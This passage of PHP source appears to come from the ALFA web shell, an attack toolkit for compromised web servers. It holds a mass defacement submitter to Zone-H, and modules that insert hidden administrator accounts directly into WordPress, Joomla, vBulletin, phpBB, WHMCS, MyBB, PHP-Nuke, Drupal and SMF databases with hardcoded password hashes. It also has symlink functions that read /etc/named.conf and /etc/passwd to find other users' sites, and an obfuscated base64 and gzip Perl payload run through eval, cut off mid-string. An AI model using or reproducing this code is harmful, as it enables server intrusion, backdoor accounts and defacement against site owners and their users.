$x=1;
foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
echo '</select><br><select id="text" name="reason" style="width:200px;">';
$x=1;
foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
echo '</select><br>
<textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
<p><input type="submit" value=" " name="go" /></p>
</form></center>';
if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
ob_start();
$hacker = $_POST['alfa1'];
$method = $_POST['alfa2'];
$neden = $_POST['alfa3'];
$site = $_POST['alfa4'];
if(empty($hacker)){
die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
}elseif($method == "------------------------------------SELECT-------------------------------------"){
die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
}elseif($neden == "------------------------------------SELECT-------------------------------------"){
die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
}elseif(empty($site)){
die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
}
$i = 0;
$sites = explode("\n", $site);
$alfa = new AlfaCURL();
while($i < count($sites)){
if(substr($sites[$i], 0, 4) != "http"){
$sites[$i] = "http://".$sites[$i];
}
$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
++$i;
}
echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
}
echo "</div>";
alfafooter();
}
function alfapwchanger(){
alfahead();

echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
<center><h3>';
$vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
Alfa_Create_A_Tag('pwchanger',$vals);
echo '</h3></center>';
if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){

echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
<p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form>';
if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
$localhost = $_POST['alfa3'];
$database = $_POST['alfa4'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
$sole = @mysqli_num_rows($solevisible);
if ($sole == 1){
$solevis = @mysqli_fetch_assoc($solevisible);
$res = $solevis['ID'];
}
$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){

echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa3'];
$database = $_POST['alfa4'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
$sole =@mysqli_num_rows($solevisible);
if ($sole == 1){
$solevis =@mysqli_fetch_assoc($solevisible);
$res = $solevis['id'];
}
$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){

echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$prefix = $_POST['alfa7'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
$sole = mysqli_num_rows($solevisible);
if($sole == 1){
$solevis = mysqli_fetch_assoc($solevisible);
$res = $solevis['userid'];
}
$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){

echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$hash = md5('solevisible');
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');
}
}
}
if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){

echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa5'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){

echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa5'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){

echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa5'];
$admin = $_POST['alfa7'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$hash = md5($pwd);
$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){

echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
 );
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa4'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
$getDescuid = @mysqli_fetch_assoc($getDescuid);
$getDescuid = $getDescuid['uid'];
$getdescuid = $getDescuid++;
$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
$sole = mysqli_num_rows($solevisible);
if ($sole == 1){
$solevis = mysqli_fetch_assoc($solevisible);
$res = $solevis['uid'];
}
$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}

if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){

echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 );
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$prefix = $_POST['alfa7'];
$admin = $_POST['alfa8'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$setpwAlg = sha1(strtolower($admin) . 'solevisible');
$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
echo "</div>";
alfafooter();
}
function alfaMakePwd(){
	if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
		return "/home/{user}/public_html/";
	}
	$document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
	$public = end($document);
	array_pop($document);
	array_pop($document);
	$path = implode("/", $document) . "/{user}/" . $public;
	return $path;
}
function alfaGetDomains($state = false){
	$state = "named.conf";
	$lines = array();
	$lines = _alfa_file('/etc/named.conf');
	if(!$lines){
		$lines = @scandir("/etc/valiases/");
		$state = "valiases";
		if(!$lines){
			$lines = @scandir("/var/named");
			$state = "named";
			if(!$lines && $state){
				$lines = _alfa_file('/etc/passwd');
				$state = "passwd";
			}
		}
	}
	return array("lines" => $lines, "state" => $state);
}
function alfasymlink(){
alfahead();
AlfaNum(9,10);
echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
	$sympath = alfaMakePwd();
	@mkdir('cgialfa',0755);
	@chdir('cgialfa');
	alfacgihtaccess('cgi');
	$perl = '#!/usr/bin/perl   -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("H4sIAAAAAAAA/50YC1PaSPivbFOuSVrJg2q1BFDOas+Ztt5U25sb8ZhNdoHUkOSyC0KR/vb79pEYFW3nMmPYzX7v9zpjFEVZyjhOOTo5Gx6+P0HdHqKLmHGGGkefvq7M9/3zo7/6fw9PPp0ffT7uHx6Z62C6RI15y0ddZBhqE6p1PEKWomOjVV7EQNY4zFJOU97ky5y2EacL7k74NBmkg7QjFr3OhGLS6/CYJ7R3mBFKULhE/Q/HfXRO+x87rjrpML6EH7wSJJqERlmBeZyl7TRLabDuuOq84ypyYUaWKBxHWZIVXfO5Jx+zZwRKLLND4jmSKF0jx4TE6bjte/kiCKa4GMdpM8w4z6bqW5gVhBZtP18ggtkEJHw+kk8g6bdhJ8gHUjScxOO0HYHOtAhGoH3zmsbjCW+HWULUBxZ/p+3WG6Bs3GrMsoQihgl6geJ0HrM4hP0PdLacJnF6hX5foj9pkXRcELxnBmuaMLrSbmj0P7//euFdBtoT0TjGyQi7RrBmsxDIDXFR4CVagbMswPG2GnPfswH0YCgc+NvcH8FminO0agxFDPhrdCAAg4LyWZEiSwUFIPujlUBe2/a+3/YUg/yalLTfaKrxyHqmQ2GlaQhhgzUcABSi/yKDxAWNuFEBGO4km1J3NWO0WLv5LEziaChiRCgCeE0KIJRHboqnlDgQuiMDvXiBmkR/n4PtMaPM/UWaByxPYg4Cy1/LHbjulop7493p4ZePR5/Oh59PT8+Nta3ifBdg8yxHCjGoLTW7b1mcWoZrbOnvtgMSaOYGcoCCstgUX1FelEbbBq5zKl7+nnjvaCPqFOoApApV82GEmZA6EO8irlAZ7cfweD5EOzDcdoyOK04hNQQgJxtoJXTEBSWMJgUddU3DAamodNLFvnguDbSPzG94jllUxDlv44QW3DKuoYKI6jGKU4JINsVx6jiOYZttZE44z9uua4IQ1HYME3HILMq75jBMcHpl3hPa8/qtlqeEpjWhcSX4Bi2P